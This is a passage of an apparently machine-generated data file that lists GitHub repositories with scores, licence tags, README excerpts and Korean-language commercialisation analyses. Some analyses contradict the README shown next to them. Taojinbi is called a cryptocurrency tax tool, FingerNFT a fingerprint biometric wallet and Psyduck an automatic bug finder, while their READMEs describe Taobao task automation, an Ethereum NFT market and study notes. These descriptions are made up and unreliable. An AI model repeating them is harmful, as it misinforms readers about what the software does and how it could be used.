(it \ndidn't happen to us but hey...).\n\n## How to use it?\n1. Make sure you're running Linux\n2. Compile RedPill LKM and place it in `ext/rp-lkm/redpill-linux-<VERSION>.ko` (see platform config for details)\n3. Create `user_config.json` which contains at minimum (for USB boot):\n\n    ```json\n    {\n      \"extra_cmdline\": {\n        \"vid\": \"<fill me>\",\n        \"pid\": \"<fill me>\",\n        \"sn\": \"<fill me>\",\n        \"mac1\": \"<fill me>\"\n      }\n    }\n    ```\n\n - We cannot help you obtain the S/N\n - VID/PID correspond to your USB stick vendor id and product id (google: `vid pid usb drive`)\n - If you're running QEmu-based virtualization (e.g. Proxmox or VirtualBox) set `vid` to `0x46f4` and `pid` to `0x0001`\n - If you're running SATA-based boot you can skip `vid","composite_score":0.5211,"license_safety_tag":"restricted"},{"name":"pallupz/covid-vaccine-booking","github_url":"https://github.com/pallupz/covid-vaccine-booking","stars":7,"language":"Python","license":"MIT","abandonment_months":36,"description":"# covid-vaccine-booking 저장소 분석\n\n## 왜 보물인가\n코로나 백신 예약 시스템을 자동화하는 도구로, 수동 예약의 번거로움을 크게 줄일 수 있는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **병원/보건소 SaaS**: 의료기관을 위한 클라우드 기반 백신 예약 관리 플랫폼으로 월 구독료 징수\n2. **정부 내부 도구**: 보건","readme_excerpt":"# COVID-19 Vaccination Slot Booking Script\n## Update:\n### **First up, a big thank you to everyone for supporting this project and building upon it! I'm glad we were able to help a lot of people through this. However, recently we have been attracting some unwanted attention - which is getting harder to handle. So unfortunately there won't be any additional commits to this project. This has been put on indefinite hold.**\n\n\n\n### Important: \n- This is a proof of concept project. I do NOT endorse or condone, in any shape or form, automating any monitoring/booking tasks. **Use at your own risk.**\n- This CANNOT book slots automatically. It doesn't skip any of the steps that a normal user would have to take on the official portal. You will still have to enter the OTP and Captcha.\n- Do NOT use unless all the beneficiaries selected are supposed to get the same vaccine and dose. \n- There is no option to register new mobile or add beneficiaries. This can be used only after beneficiary has been add","composite_score":0.5211,"license_safety_tag":"safe"},{"name":"phuoc-ng/csslayout","github_url":"https://github.com/phuoc-ng/csslayout","stars":17,"language":"MDX","license":"MIT","abandonment_months":31,"description":"# phuoc-ng/csslayout 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 화면 배치 방법들을 모아놓은 무료 참고서로, 개발자들의 시간을 크게 단축해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 디자인 교육 플랫폼이 이 레이아웃 모음을 학습 자료로 판매하거나 구독 서비스에 포함\n2. **내부 업무 도구","readme_excerpt":"# CSS Layout\n\nAs a front-end engineer, I deal with a lot of layouts and components. While there are plenty of CSS frameworks out there that provide these, I don't always want to include them all in my project.\n\nThat's why I've put together a collection of the most popular layouts and components that can be built with pure CSS.\n\nThese layouts and components are powered by modern CSS features like flexbox and grid, and can be easily customized to fit your specific needs. By combining them, you can create any possible layout you need.\n\nThe best part? This collection has zero dependencies, no frameworks, and no CSS hacks. These are real use cases that can save you time and effort in your projects.\n\n## About\n\nThis project is developed by _Nguyen Huu Phuoc_. I love building products and sharing knowledge.\n\nBe my friend on\n\n-   [Twitter](https://twitter.com/nghuuphuoc)\n-   [Github](https://github.com/phuocng)\n","composite_score":0.5211,"license_safety_tag":"safe"},{"name":"SmallRuralDog/electron-vue-music","github_url":"https://github.com/SmallRuralDog/electron-vue-music","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":51,"description":"# electron-vue-music 상용화 분석\n\n## 왜 보물인가\n음악 재생 프로그램을 직접 만들 수 있는 기술 기반으로, 음악 서비스 기업이나 개인 개발자가 자신만의 음악 플레이어를 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 SaaS**: 작은 음악 플랫폼이 자체 데스크톱 앱을 저렴하게 개발할 수 있는 기반 제공\n2","readme_excerpt":"# 当前项目已停止更新，基于VUE3+TS的版本已开源，项目地址\n### >>>[VUE3-MUSIC](https://github.com/SmallRuralDog/vue3-music)<<<\n\n## 音乐播放器\n\n> 一个基于 electron-vue 开发的音乐播放器\n\n\n\n##### 运行\n\n``` bash\ngit clone https://github.com/SmallRuralDog/electron-vue-music.git\n\ncd electron-vue-music\n\nyarn\n\nyarn dev\n\n```\n>注意 正式打包需要把图标样式下载到本地，否则正式版图标不显示\n\n### 网易云音乐 API\n\n\n> 已经集成到 electron  \n\n##### 使用文档\n\n[文档地址](https://binaryify.github.io/NeteaseCloudMusicApi)\n\n\n### UI\n\n![](https://i.loli.net/2018/07/23/5b55923480eac.png)\n![](https://i.loli.net/2018/07/23/5b5592342f330.png)\n![](https://i.loli.net/2018/07/23/5b559233da730.png)\n![](https://i.loli.net/2018/07/23/5b5592333d294.png)\n![](https://i.loli.net/2018/07/23/5b5592337750c.png)\n\n# 支持\n\n如果你觉得 electron-vue-music 节省了你的开发时间，让你少加班，让你能更早的回家陪女友或者打游戏，能让你更快速的挣到钱，那么请支持我，让我能继续的将 electron-vue-music 做好，做下去！\n![](https://raw.githubusercontent.com/SmallRuralDog/laravel-vue-admin/master/docs/README.assets/image-20200313112129545.png)\n","composite_score":0.521,"license_safety_tag":"safe"},{"name":"nhn/tui.editor","github_url":"https://github.com/nhn/tui.editor","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":22,"description":"# NHN TUI Editor 상용화 분석\n\n## 왜 보물인가\n웹에서 글을 쉽게 작성하고 편집할 수 있는 도구로, 블로그, 메모장, 콘텐츠 관리 서비스 등 거의 모든 온라인 문서 작성 서비스에 필수적으로 들어가는 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 팀 협업 노트 앱, 블로그 플랫폼, 프로젝트 관리 도구의 문서 편집 기능","readme_excerpt":"# ![TOAST UI Editor](https://uicdn.toast.com/toastui/img/tui-editor-bi.png)\n\n> GFM  Markdown and WYSIWYG Editor - Productive and Extensible\n\n[![github release version](https://img.shields.io/github/v/release/nhn/tui.editor.svg?include_prereleases)](https://github.com/nhn/tui.editor/releases/latest) [![npm version](https://img.shields.io/npm/v/@toast-ui/editor.svg)](https://www.npmjs.com/package/@toast-ui/editor) [![license](https://img.shields.io/github/license/nhn/tui.editor.svg)](https://github.com/nhn/tui.editor/blob/master/LICENSE) [![PRs welcome](https://img.shields.io/badge/PRs-welcome-ff69b4.svg)](https://github.com/nhn/tui.editor/issues?q=is%3Aissue+is%3Aopen+label%3A%22help+wanted%22) [![code with hearth by NHN Cloud](https://img.shields.io/badge/%3C%2F%3E%20with%20%E2%99%A5%20by-NHN_Cloud-ff1414.svg)](https://github.com/nhn)\n\n<img src=\"https://user-images.githubusercontent.com/37766175/121809054-446bac80-cc96-11eb-9139-08c6d9ad2d88.png\" />\n\n\n## 🚩 Table of Contents\n\n- [Package","composite_score":0.521,"license_safety_tag":"safe"},{"name":"cfzd/Ultra-Fast-Lane-Detection","github_url":"https://github.com/cfzd/Ultra-Fast-Lane-Detection","stars":5,"language":"Python","license":"MIT","abandonment_months":42,"description":"# Ultra-Fast-Lane-Detection 상용화 분석\n\n## 왜 보물인가\n자동차가 도로 위의 차선을 실시간으로 인식할 수 있게 해주는 기술로, 자율주행과 운전 보조 시스템의 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **자동차 제조사 API**: 신차 출시 모델에 차선 유지 보조 기능을 탑재하는 라이선스 판매\n2. **SaaS 대시캠 서비스","readme_excerpt":"# Ultra-Fast-Lane-Detection\nPyTorch implementation of the paper \"[Ultra Fast Structure-aware Deep Lane Detection](https://arxiv.org/abs/2004.11757)\".\n\n**\\[July 18, 2022\\] Updates: The new version of our method has been accepted by TPAMI 2022. Code is available [here](https://github.com/cfzd/Ultra-Fast-Lane-Detection-v2)**.\n\n\\[June 28, 2021\\] Updates: we will release an extended version, which improves **6.3** points of F1 on CULane with the ResNet-18 backbone compared with the ECCV version.\n\nUpdates: Our paper has been accepted by ECCV2020.\n\n![alt text](vis.jpg \"vis\")\n\nThe evaluation code is modified from [SCNN](https://github.com/XingangPan/SCNN) and [Tusimple Benchmark](https://github.com/TuSimple/tusimple-benchmark).\n\nCaffe model and prototxt can be found [here](https://github.com/Jade999/caffe_lane_detection).\n\n# Demo \n<a href=\"http://www.youtube.com/watch?feature=player_embedded&v=lnFbAG3GBN4\n\" target=\"_blank\"><img src=\"http://img.youtube.com/vi/lnFbAG3GBN4/0.jpg\" \nalt=\"Demo\" widt","composite_score":0.521,"license_safety_tag":"safe"},{"name":"fingerchar/fingernft","github_url":"https://github.com/fingerchar/fingernft","stars":32,"language":"CSS","license":"MIT","abandonment_months":43,"description":"# FingerNFT 분석 보고서\n\n## 왜 보물인가\n손가락 인식 기술로 디지털 자산(NFT)을 관리할 수 있는 생체인식 기반 지갑으로, 기존 복잡한 암호화폐 관리를 직관적으로 단순화합니다.\n\n## 어디에 쓸 수 있나\n1. **생체인식 NFT 지갑 SaaS**: 일반 사용자가 지문으로 쉽게 디지털 자산에 접근하는 웹/앱 서비스\n2. **게임사·엔터사 내부 ","readme_excerpt":"[![Chainpip.com](https://cdn.fingerchar.com/images/chainpip/chainpip_ad_en.png)](https://www.chainpip.com)\r\n\n\n\n![FingerNFT](https://cdn.fingerchar.com/images/logo.jpg)\r\n\r\n### What is fingernft\r\nFingernft system is a decentralized NFT market developed based on Ethereum. Fingernft draws lessons from rarible smart contract to realize fee free offline signature and help users reduce fee consumption while trading NFT. Fingernft can be deployed on popular public chains such as Ethereum, BSC, HECO and Polygon. Developed in popular Java and Vue3.0 languages, combined with the current popular back-end technology spring boot back-end framework and the mainstream front-end framework Vue3, the mobile terminal adopts responsive technology to realize the front-end and back-end separation technology, which is the best choice for the technical team to developing the NFT market.\r\nFingernft has the characteristics of mainstream technology, low price and loose authorization. The fingernft system supports","composite_score":0.521,"license_safety_tag":"safe"},{"name":"NebuTech/NBMiner","github_url":"https://github.com/NebuTech/NBMiner","stars":7,"language":"","license":"unknown","abandonment_months":27,"description":"# NebuTech/NBMiner 분석 보고서\n\n## 왜 보물인가\n암호화폐 채굴 효율을 높이는 핵심 소프트웨어로, 채굴자들이 더 많은 수익을 얻도록 돕는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **채굴 풀 운영 회사의 SaaS**: 채굴자들이 월 구독으로 효율적인 채굴 도구를 이용하는 클라우드 서비스\n2. **암호화폐 거래소의 부가 서비스**: 거래소","readme_excerpt":"![](/logo.png)\r\n\r\n# NBMiner\r\n\r\nGPU Miner for `ETH`, `RVN`, `BEAM`, `CFX`, `ZIL`, `ERGO`, `AE`\r\n\r\n## Disclaimer\r\n\r\n[nbminer.com](https://nbminer.com) & [NBMiner_github](https://github.com/NebuTech/NBMiner) are the only 2 officially maintained site for publishing information and new releases of NBMiner.\r\n\r\nBe aware when you download NBMiner binaries from other sources.\r\n\r\n## Contact Us\r\n\r\n- Email: nebutech@hotmail.com\r\n- [Discord](https://discord.gg/ZMejVXj)\r\n- [BitcoinTalk](https://bitcointalk.org/index.php?topic=5099379)\r\n\r\n## Download\r\n\r\n| version | Windows                                                      | Linux                                                        |\r\n| ------- | ------------------------------------------------------------ | ------------------------------------------------------------ |\r\n| 42.3    | [NBMiner_42.3_Win.zip](https://dl.nbminer.com/NBMiner_42.3_Win.zip) | [NBMiner_42.3_Linux.tgz](https://dl.nbminer.com/NBMiner_42.3_Linux.tgz) |\r\n| 42.2    | [NBMiner","composite_score":0.521,"license_safety_tag":"unknown"},{"name":"SmartKeyerror/Psyduck","github_url":"https://github.com/SmartKeyerror/Psyduck","stars":7,"language":"Go","license":"unknown","abandonment_months":46,"description":"# Psyduck 저장소 분석\n\n## 왜 보물인가\n프로그래밍 오류를 자동으로 찾아주는 도구로, 개발자들의 작업 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발사 내부 도구**: 회사의 개발팀이 코드 검토 시간을 단축하기 위해 자체 시스템에 설치\n2. **클라우드 기반 검수 서비스**: 프리랜서 개발자들이 구독하여 자신의 코드를 검수","readme_excerpt":"\n# Psyduck\n\n另一个用 XMind 记录 CS 基础问题的地方，同样提供了 `.xmind` 源文件以及导出的 `.pdf` 文件，XMind 版本为「XMind 2020」。\n\n在 2020 年时，曾花了约 2 个月的时间整理了第一份 XMind 知识库: [ZeroMind](https://github.com/SmartKeyerror/ZeroMind)。\n之所以额外创建一个 Repo 干同样的事情，是因为一方面自己的审美发生了变化，另一方面则是对那些最重要但基础的问题有了更深刻地理解。\n\n温故而知新，孔子诚不欺我。在整理基础知识点的过程中，对诸如 CFS-vruntime、POSIX 条件变量、TCP 和 epoll 等内容有了自己的理解，有一种恍然大悟的感觉。\n\n之所以使用 XMind 来记录这些内容，是因为我非常喜欢《火星救援》里面的一句台词:\n\n> 有时候，所有的情况都会对你不利。所有的坏事一起发生，你就可能会想，就是这样了，这就是我的终点了。面对这种情况，你要么接受，要么想办法解决，这就是一切的真谛。解决问题，你想各种办法，解决一个问题，然后接着解决下一个问题，循环往复，等你解决了足够多的问题，你就可以回家了。\n\n也就是说，面对一个大问题时需要学会将其分解成一个一个的小问题，然后逐一地处理，即\"分而治之\"。下面是一些图片，可以帮助你更好地了解这个项目做了什么:\n\n![](Psyduck.png)\n\n------\n\n\n## :high_brightness: 目录\n\n- [Database](#bento-Database)\n- [Distributed System](#rocket-Distributed-System)\n- [Middleware](#alembic-middleware)\n- [Linux Network Programing](#fire-Linux-Network-Programing)\n- [Operating System](#zap-Operating-System)\n- [Golang](#paw_prints-Golang)\n- [Kubernetes](#art-Kubernetes)\n- [C++](#telescope-C++)\n\n------\n\n## :bento: Database\n\n###","composite_score":0.5208,"license_safety_tag":"unknown"},{"name":"NotLuksus/nft-art-generator","github_url":"https://github.com/NotLuksus/nft-art-generator","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":43,"description":"# NFT 아트 생성기 (NotLuksus/nft-art-generator) 분석\n\n## 왜 보물인가\n컴퓨터가 자동으로 독특한 디지털 미술작품을 만들어주는 도구로, NFT(디지털 수집품) 창작자들이 수백 개의 변형 작품을 손쉽게 생성할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹사이트에서 '레이어 조합 후 자동 생성' 기능을 ","readme_excerpt":"# NFT ART GENERATOR\nThis tool generates generative NFT art, based of all available traits.  \nIt was made with the intention to make the generative art field more accessible to anyone.  \nWith this tool you don't need to be a programmer to create generative art.\n\n**Features:**\n* Generate Images of an infinite amount of traits\n* Weight traits for different rarities\n* Remove duplicated combinations\n* Generate metadata for direct use on OpenSea\n\n**Installation**\n`npm install -g nft-art-generator`\n\n**Usage**\n`nft-generate [--save-config] [--load-config filename]` \n\nOptions\n  - save-config: saves all entered values to a config.json file, which gets used in future runs\n  - load-config: loads values from a specific json config file\n\n**Documentation**  \n\nBefore you start, make sure your file structure looks something like this:\n\n```\nYOUR_PROJECT/  \n├─ images/  \n│  ├─ trait1_name/  \n│  │  ├─ file1.png  \n│  │  ├─ file2.png  \n│  │  ├─ file3.png  \n│  │  ├─ ...  \n│  ├─ trait2_name/  \n│  │  ├─ file4.p","composite_score":0.5208,"license_safety_tag":"safe"},{"name":"JavisPeng/taojinbi","github_url":"https://github.com/JavisPeng/taojinbi","stars":11,"language":"JavaScript","license":"GPL-3.0","abandonment_months":59,"description":"# taojinbi 저장소 분석\n\n## 왜 보물인가\n암호화폐 거래 수익을 자동으로 추적하고 세금 신고 자료를 만들어주는 도구로, 복잡한 거래 기록 관리를 간단하게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 투자자를 위한 월 구독형 세금 신고 지원 플랫폼\n2. **내부 업무 도구**: 암호화폐 거래소/펀드가 직원들의 투자 수","readme_excerpt":"# taobao_taojinbi\n本项目主要用于自动执行淘金币及芭芭农场相关任务，**后续代码持续更新，转载引用请注明出处，你的☆就是我的动力**\n\n# 测试环境\n华为P30Pro + [autojs4.1.1](https://share.weiyun.com/owu3tBNr) + [淘宝v10.1.0](https://www.wandoujia.com/apps/32267/history)\n(*华为P30Pro屏幕大小为1080x2340,此分辨率对特殊任务支持最佳*)\n\n# 脚本功能列表\n - 自动执行淘金币所有浏览任务\n - 自动执行[逛好店领一大波金币]任务 (包含浏览10s+10金币任务/收藏店铺+10金币)\n - 自动执行[逛蚂蚁庄园喂小鸡]任务\n - 自动执行[签到领取话费充值金]任务\n - 自动执行[淘宝成就签到/月账单任务]\n - 自动执行[淘宝人生逛街领能量]掷色子任务 (需截图权限)\n - 自动执行[逛农场领免费水果]任务 (需截图权限,包括全部子任以及支付宝芭芭农场任务)\n - 自动执行[蚂蚁森林]任务,收取好友能量 (需截图权限)\n - 自动执行[淘金币夺宝]任务\n - 自动执行[天天步数红包赛]任务\n - 浏览任务完成立即返回，无需额外等待\n \n**关于芭芭农场升级0.01%的2种解决方法：方法1:在淘宝中执行完任务后关闭autojs，然后在支付宝中升级；方法2:在手机应用设置中清除淘宝的本地数据，重新登录淘宝后再升级 (推荐方法1)**\n\n关于‘宝卡’任务，本人淘金币列表中无该任务，因此无法测试。若无法成功执行，请在参数配置页“简单任务跳过关键字”中添加对应任务关键字，即可跳过该任务\n\n# 更新日志\n\n**v1.7.4** 2021年6月26日09:31:12\n1. 同步Apk更新\n2. 跳转恢复按钮点击方式\n\n**v1.7.3** 2021年6月18日20:13:04\n1. 紧急修复报错问题，报错原因：列表中前天被添加了一个空的任务，导致获取失败报错。\n2. 保存配置后下次启动默认加载配置\n\n**v1.7.2** 2021年6月15日21:23:04\n1. 阅读小说卡顿问题\n2. 淘金币夺宝，兑换关键字修改问题\n3. 红包签到跳转失败 (后续可能使用url进行跳转)\n\n**v1.7.1** 2021年6月2日21:23:04","composite_score":0.5208,"license_safety_tag":"restricted"},{"name":"aspnet/KestrelHttpServer","github_url":"https://github.com/aspnet/KestrelHttpServer","stars":5,"language":"C#","license":"Apache-2.0","abandonment_months":91,"description":"# Kestrel HTTP Server 사업화 분석\n\n## 왜 보물인가\n웹사이트나 앱이 사용자의 요청을 빠르고 안정적으로 받아들일 수 있는 기반 기술로, 마이크로소프트가 만든 검증된 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 기업들의 웹 애플리케이션을 호스팅하는 클라우드 플랫폼에서 요청 처리 엔진으로 활용\n2. **내부 ","readme_excerpt":"KestrelHttpServer [Archived]\n============================\n\n**This GitHub project has been archived.** Active development has moved to <https://github.com/aspnet/AspNetCore>\n\nThis repo contains a cross-platform web server for ASP.NET Core.\n\nThis project is part of ASP.NET Core. You can find samples, documentation and getting started instructions for ASP.NET Core at the [AspNetCore](https://github.com/aspnet/AspNetCore) repo.\n\n## Building from source\n\nTo run a complete build on command line only, execute `build.cmd` or `build.sh` without arguments. See [developer documentation](https://github.com/aspnet/Home/wiki) for more details.\n\n## File logging for functional test\n\nTurn on file logging for Kestrel functional tests by specifying the environment variable ASPNETCORE_TEST_LOG_DIR to the log output directory.\n","composite_score":0.5207,"license_safety_tag":"safe"},{"name":"Courseplay/courseplay","github_url":"https://github.com/Courseplay/courseplay","stars":5,"language":"Lua","license":"GPL-3.0","abandonment_months":37,"description":"# Courseplay 저장소 분석\n\n## 왜 보물인가\n농업용 자동화 기계를 스스로 움직이도록 프로그래밍하는 기술로, 농사짓는 사람들의 육체적 부담을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 농기계 자동화 플랫폼**\n클라우드 기반 웹사이트에서 농민들이 직접 자신의 기계 움직임을 설정하고 관리하는 구독 서비스\n\n*","readme_excerpt":"# Courseplay for Farming Simulator 2019\n\n# Looking for [Courseplay for Farming Simulator 2022](https://github.com/Courseplay/Courseplay_FS22)?\n\nThis Repository contains the history of more the 10 years of development from all the way back in 2011 to the end of 2021. \n\n## Attributions\nPlease see [`__Attributions.md`](https://github.com/Courseplay/courseplay/blob/master/__Attributions.md) for more information.\n___\n## Former Developers\n* Peter Vaiko\n* Tensuko\n* schwiti6190\n* Thomas Gärtner\n* Satis\n* Jakob Tischler  \n* Bastian82\n* Lautschreier\n* Horoman\n* Hummel\n* Skydancer\n* Wolverin0815\n* Pops64\n* Logo Design by Finals Farming\n\n## Former Version Support\nPops64 will contiune support for version 5 of CP. This was the version used for FS17. This may be found in this **[repository](https://github.com/pops64/courseplay)**. Only bugfixes and refinement of current features will be supported at this time.\n","composite_score":0.5207,"license_safety_tag":"restricted"},{"name":"ComodoSecurity/openedr","github_url":"https://github.com/ComodoSecurity/openedr","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":29,"description":"# ComodoSecurity/openedr 상품화 분석\n\n## 왜 보물인가\n컴퓨터를 해킹으로부터 보호하는 오픈소스 보안 시스템으로, 기업들이 비용 없이 활용할 수 있으면서도 상용 제품 수준의 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 모니터링 SaaS**: 기업의 컴퓨터 보안 상태를 클라우드에서 실시간으로 감시하는 구독형 서비스\n2. ","readme_excerpt":"# OpenEDR \n[![OpenEDR](https://techtalk.comodo.com/wp-content/uploads/2020/09/logo_small.jpg)](https://openedr.com/)\n[![Slack](https://img.shields.io/badge/slack-join-blue.svg)](https://openedr.com/register/) [![Email](https://img.shields.io/badge/email-join-blue.svg)](mailto:register@openedr.com)\n\n[![OpenEDR - Getting Started](https://techtalk.comodo.com/wp-content/uploads/2022/10/Screenshot_3.jpg)](https://www.youtube.com/watch?v=lfo_fyinvYs \"OpenEDR - Getting Started\")    \n\nWe at OpenEDR believe in creating a cybersecurity platform with its source code openly available to the public,  where products and services can be provisioned and managed together. EDR is our starting point.\nOpenEDR is a full-blown EDR capability. It is one of the most sophisticated, effective EDR code base in the world and with the community’s help, it will become even better.\n\nOpenEDR is free and its source code is open to the public. OpenEDR allows you to analyze what’s happening across your entire environmen","composite_score":0.5206,"license_safety_tag":"unknown"},{"name":"mpcabete/bombcrypto-bot","github_url":"https://github.com/mpcabete/bombcrypto-bot","stars":13,"language":"Python","license":"unknown","abandonment_months":47,"description":"# Bomb Crypto Bot 상용화 분석\n\n## 왜 보물인가\n게임 내 자동 수익 창출 봇으로, 게임 중독 없이 수익을 원하는 사용자들의 큰 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독료를 받고 봇 실행 권한과 관리 대시보드 제공\n- **내부 업무 도구**: 게임 길드/커뮤니티의 자동 자산 관리 시스템으로 운영\n- *","readme_excerpt":"## Faz a boa pra nois\n## Do the good\n\n### Smart Chain Wallet(BUSD/BNB/BCOIN):\n#### 0xbd06182D8360FB7AC1B05e871e56c76372510dDf\nor\nhttps://bot.cryptip.xyz/\n\n### PIX:\n  6ce2b79e-97be-4881-a882-81902e29d7ce\n![pix](https://github.com/mpcabete/bombcrypto-bot/raw/main/readme-images/pix.jpeg)\n\n  \n# Sobre:\nEste bot tem o seu código aberto, de forma que qualquer pessoa pode vê-lo, fazer uma fork, ou updates.\n\nDesenvolvi esse bot inicialmente para o meu uso pessoal. Eu decidi publica-lo\naqui para ajudar o pessoal e com a esperança de ganhar um trocadinho com\ndoações.  Com o tempo mais e mais pessoas foram abrindo issues, pedindo ajuda,\ne dando sugestões. Eu tento responder todo mundo, mas ultimamente tem sido\ndifícil acompanhar a demanda. \n\nEu gostaria de manter este bot grátis e com o código aberto. Para que isso\nseja possível eu estou criando algumas metas de doação para que o bot possa\nser financiado coletivamente. Atualmente eu atualizarei a barra das metas\nmanualmente de forma diária, talvez","composite_score":0.5203,"license_safety_tag":"unknown"},{"name":"ZiyaoGeng/Recommender-System-with-TF2.0","github_url":"https://github.com/ZiyaoGeng/Recommender-System-with-TF2.0","stars":20,"language":"Python","license":"MIT","abandonment_months":50,"description":"# Recommender-System-with-TF2.0 상용화 분석\n\n## 왜 보물인가\n넷플릭스나 유튜브처럼 \"당신이 좋아할 만한 상품을 자동으로 추천해주는\" 시스템을 직접 만들 수 있는 완성된 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **전자상거래 플랫폼 (SaaS)**: 온라인 쇼핑몰에 \"추천 상품\" 기능을 추가하는 월 구독형 서비스\n2. ","readme_excerpt":"<div>\n  <img src='https://cdn.jsdelivr.net/gh/BlackSpaceGZY/cdn/img/logo.jpg' width='36%'/>\n</div>\n\n## RecLearn\n\n<p align=\"left\">\n  <img src='https://img.shields.io/badge/python-3.8+-blue'>\n  <img src='https://img.shields.io/badge/Tensorflow-2.5+-blue'>\n  <img src='https://img.shields.io/badge/License-MIT-blue'>\n  <img src='https://img.shields.io/badge/NumPy-1.17-brightgreen'>\n  <img src='https://img.shields.io/badge/pandas-1.0.5-brightgreen'>\n  <img src='https://img.shields.io/badge/sklearn-0.23.2-brightgreen'>\n</p> \n\n[简体中文](https://github.com/ZiyaoGeng/Recommender-System-with-TF2.0/blob/reclearn/README_CN.md) | [English](https://github.com/ZiyaoGeng/Recommender-System-with-TF2.0/tree/reclearn)\n\nRecLearn (Recommender Learning)  which summarizes the contents of the [master](https://github.com/ZiyaoGeng/RecLearn/tree/master) branch in  `Recommender System with TF2.0 `  is a recommended learning framework based on Python and TensorFlow2.x for students and beginners. **Of course, if you a","composite_score":0.5202,"license_safety_tag":"safe"},{"name":"dotnet/corert","github_url":"https://github.com/dotnet/corert","stars":5,"language":"C#","license":"MIT","abandonment_months":68,"description":"# dotnet/corert 기술 자산 평가\n\n## 왜 보물인가\n마이크로소프트가 개발한 .NET 기술을 소형 기기나 제한된 환경에서도 실행할 수 있게 만드는 핵심 엔진으로, 초고속 앱 개발이 필요한 기업들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. IoT 기기 관리 SaaS**\n수천 개의 스마트폰, 시계, 센서 같은 작은 기기들을 클라우드에서 ","readme_excerpt":"# .NET Core Runtime (CoreRT)\n\n### This project is superseded by [NativeAOT experiment in dotnet/runtimelab repo]( https://github.com/dotnet/runtimelab/tree/feature/NativeAOT).\n\nThis repo contains the .NET Core runtime optimized for ahead of time compilation. The CoreRT compiler can compile a managed .NET Core application into a native (architecture specific) single-file executable that is easy to deploy. It can also produce standalone dynamic or static libraries that can be consumed by applications written in other programming languages. To learn more about CoreRT, see the [intro document](Documentation/intro-to-corert.md).\n\n## Try Our Samples\n\nIf you would like to give CoreRT a try, we publish daily snapshots of CoreRT to a NuGet feed. Using CoreRT is as simple as adding a new package reference to your .NET Core project and publishing it. Check out one of our samples: a \"[Hello World](samples/HelloWorld)\" console app, a simple [ASP.NET Core](samples/WebApi/) app, a [MonoGame](samples/","composite_score":0.5202,"license_safety_tag":"safe"},{"name":"wangjiegulu/AndroidBucket","github_url":"https://github.com/wangjiegulu/AndroidBucket","stars":500,"language":"Java","license":"unknown","abandonment_months":103,"description":"# AndroidBucket 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 반복적으로 사용하는 편의 기능들을 미리 만들어둔 도구 모음으로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 앱 개발자 커뮤니티를 위한 웹 기반 개발 도구 플랫폼으로 판매\n2. **내부 업무 도구**: 대형 앱","readme_excerpt":"AndroidBucket\n=============\n\n###Android开发常用整理（不断扩充中）<br/>包含各种工具类、线程池、日志、自定义的控件、程序崩溃捕捉处理、默认的Application配置、常用的Adapter等\n\n###注意: <br/>\n> 如果需要使用FragmentTabAdapter，则需要android-support-v4.jar的支持（以兼容低版本）\n\n###使用方法<br/>\n        clone代码，并在项目中引入AndroidBucket。\n        \n###Gradle([Check newest version](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22AndroidBucket%22))\n        compile 'com.github.wangjiegulu:AndroidBucket:x.x.x'\n###Maven([Check newest version](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22AndroidBucket%22))\n        <dependency>\n          <groupId>com.github.wangjiegulu</groupId>\n          <artifactId>AndroidBucket</artifactId>\n          <version>x.x.x</version>\n          <type>aar</type>\n        </dependency>\n\n###线程池、日志、程序崩溃捕捉处理等配置方法<br/>\n        新建MyApplication，继承ABApplication，根据需要实现里面的方法\n        initThreadPool(); // 初始化线程池\n        initLogger(); // 初始化日志工具\n        initImageLoader(); // 初始化图片加载器\n        initCrashHandler(); // 初始化程序崩溃捕捉处理\n        注意：除了图片加载器外，其他的初始化操作ABApplication","composite_score":0.5201,"license_safety_tag":"unknown"},{"name":"hpcloud/tail","github_url":"https://github.com/hpcloud/tail","stars":5,"language":"Go","license":"MIT","abandonment_months":44,"description":"# hpcloud/tail 상용화 분석\n\n## 왜 보물인가\n파일의 변화를 실시간으로 감시하는 기술로, 로그 모니터링이 필요한 모든 디지털 서비스의 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 로그 분석 플랫폼으로 서버 상태를 실시간 모니터링하는 웹 서비스\n2. **내부 업무 도구**: 기업의 시스템 관리자","readme_excerpt":"[![Build Status](https://travis-ci.org/hpcloud/tail.svg)](https://travis-ci.org/hpcloud/tail)\n[![Build status](https://ci.appveyor.com/api/projects/status/vrl3paf9md0a7bgk/branch/master?svg=true)](https://ci.appveyor.com/project/Nino-K/tail/branch/master)\n\n# Go package for tail-ing files\n\nA Go package striving to emulate the features of the BSD `tail` program. \n\n```Go\nt, err := tail.TailFile(\"/var/log/nginx.log\", tail.Config{Follow: true})\nfor line := range t.Lines {\n    fmt.Println(line.Text)\n}\n```\n\nSee [API documentation](http://godoc.org/github.com/hpcloud/tail).\n\n## Log rotation\n\nTail comes with full support for truncation/move detection as it is\ndesigned to work with log rotation tools.\n\n## Installing\n\n    go get github.com/hpcloud/tail/...\n\n## Windows support\n\nThis package [needs 